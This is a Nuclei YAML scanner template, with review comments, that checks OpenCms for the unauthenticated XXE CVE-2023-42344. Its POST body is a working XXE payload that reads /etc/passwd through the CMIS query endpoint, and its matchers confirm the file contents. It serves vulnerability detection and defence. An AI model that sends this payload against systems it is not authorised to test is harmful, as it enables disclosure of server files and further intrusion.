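# Nuclei HTTP template: checks an OpenCms instance for the unauthenticated
# XXE in the CMIS query endpoint (CVE-2023-42344). It POSTs an XML document
# that declares an external entity and inspects the response body.
id: CVE-2023-42344

info:
  name: OpenCMS - XML external entity (XXE)
  author: 0xr2r
  severity: high
  # NOTE(review): what this template demonstrates is a local file read via an
  # external entity; the "execute code" wording below is broader than what the
  # request shows.
  description: |
    users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
  remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
  reference:
    - https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
    - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
  # NOTE(review): no CVSS vector, score or CWE is recorded here. XXE maps to
  # CWE-611; add the scoring fields only from the published advisory.
  classification:
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    # Two requests at most: one per entry in `path` below.
    max-request: 2
    vendor: alkacon
    product: opencms
    fofa-query: "OpenCms-9.5.3"
  tags: cve,cve2023,xxe,opencms

http:
  - method: POST
    # The same CMIS endpoint, with and without the /opencms context path.
    # For defenders: unauthenticated POSTs to these paths carrying a DOCTYPE
    # declaration are the request pattern to look for in web/WAF logs.
    path:
      - "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
      - "{{BaseURL}}/cmisatom/cmis-online/query"

    headers:
      Content-Type: "application/xml;charset=UTF-8"
      Referer: "{{RootURL}}"

    # The entity targets /etc/passwd, so the check can only succeed on
    # Unix-like hosts; a non-match on other platforms does not show the
    # instance is patched. Confirm the version against the remediation above.
    # NOTE(review): the xmlns value is wrapped in '<...>' as shown on this
    # page, which looks like an autolink artifact; compare with the upstream
    # template, since a malformed document could produce false negatives.
    body: |
      <?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
    # Stop after the first path that matches.
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      # Both patterns must appear in the response body: a passwd-style root
      # entry and the string "invalidArgument". Requiring the pair reduces
      # false positives from pages that merely contain one of them.
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "invalidArgument"
        condition: and
# NOTE(review): the digest below was issued for the template as published.
# Any edit to this file, including added comments, presumably requires
# re-signing before the signature verifies again - confirm with your workflow.
# digest: 4b0a00483046022100cd9297a69206851b5a270935eba6b12279fab44f2cd9e9f9727a44a29a1a3719022100c26954d267055f5a683fa9174f4524b95cef451fd0a5a741e7f039e72cb72f15:922c64590222798bb761d5b6d8e72950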